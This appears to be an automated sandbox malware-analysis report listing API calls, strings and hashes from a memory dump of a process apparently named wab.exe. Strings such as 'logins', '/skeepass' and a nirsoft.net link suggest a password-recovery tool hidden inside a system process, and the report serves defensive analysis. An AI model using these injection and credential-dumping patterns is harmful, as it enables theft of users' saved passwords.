                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                  • String ID: logins$null
                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • memset.MSVCRT ref: 004085CF
                                                  • memset.MSVCRT ref: 004085F1
                                                  • memset.MSVCRT ref: 00408606
                                                  • strcmp.MSVCRT ref: 00408645
                                                  • _mbscpy.MSVCRT ref: 004086DB
                                                  • _mbscpy.MSVCRT ref: 004086FA
                                                  • memset.MSVCRT ref: 0040870E
                                                  • strcmp.MSVCRT ref: 0040876B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                  • String ID: ---
                                                  APIs
                                                  • memset.MSVCRT ref: 0041087D
                                                  • memset.MSVCRT ref: 00410892
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  APIs
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • malloc.MSVCRT ref: 004186B7
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                  • malloc.MSVCRT ref: 004186FE
                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: ??3@$FullNamePath$malloc$Version
                                                  • String ID: |A
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                  • memcpy.MSVCRT ref: 0041234D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                  • String ID:
                                                  • API String ID: 1700100422-0
                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                  • String ID:
                                                  • API String ID: 552707033-0
                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                  • memcpy.MSVCRT ref: 0040C11B
                                                  • strchr.MSVCRT ref: 0040C140
                                                  • strchr.MSVCRT ref: 0040C151
                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                  • memset.MSVCRT ref: 0040C17A
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                  • String ID: 4$h
                                                  • API String ID: 4066021378-1856150674
                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: %%0.%df
                                                  • API String ID: 3473751417-763548558
                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                  APIs
                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                  • GetParent.USER32(?), ref: 00406136
                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                  • String ID: A
                                                  • API String ID: 2892645895-3554254475
                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                  APIs
                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                  • memset.MSVCRT ref: 0040DA23
                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                  • String ID: caption
                                                  • API String ID: 973020956-4135340389
                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                  APIs
                                                  Strings
                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf$wcscpy
                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                  • API String ID: 1283228442-2366825230
                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                  APIs
                                                  • wcschr.MSVCRT ref: 00413972
                                                  • wcscpy.MSVCRT ref: 00413982
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  • wcscpy.MSVCRT ref: 004139D1
                                                  • wcscat.MSVCRT ref: 004139DC
                                                  • memset.MSVCRT ref: 004139B8
                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                  • memset.MSVCRT ref: 00413A00
                                                  • memcpy.MSVCRT ref: 00413A1B
                                                  • wcscat.MSVCRT ref: 00413A27
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                  • String ID: \systemroot
                                                  • API String ID: 4173585201-1821301763
                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy
                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                  • API String ID: 1284135714-318151290
                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 4066108131-3849865405
                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                  APIs
                                                  • memset.MSVCRT ref: 004082EF
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                  • memset.MSVCRT ref: 00408362
                                                  • memset.MSVCRT ref: 00408377
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiWide
                                                  • String ID:
                                                  • API String ID: 290601579-0
                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memchrmemset
                                                  • String ID: PD$PD
                                                  • API String ID: 1581201632-2312785699
                                                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                  APIs
                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                  • GetParent.USER32(?), ref: 00409FA5
                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                  • String ID:
                                                  • API String ID: 2163313125-0
                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$wcslen
                                                  • String ID:
                                                  • API String ID: 239872665-3916222277
                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                  • String ID: %s (%s)$YV@
                                                  • API String ID: 3979103747-598926743
                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 2767993716-572158859
                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                  APIs
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 0040DAFB
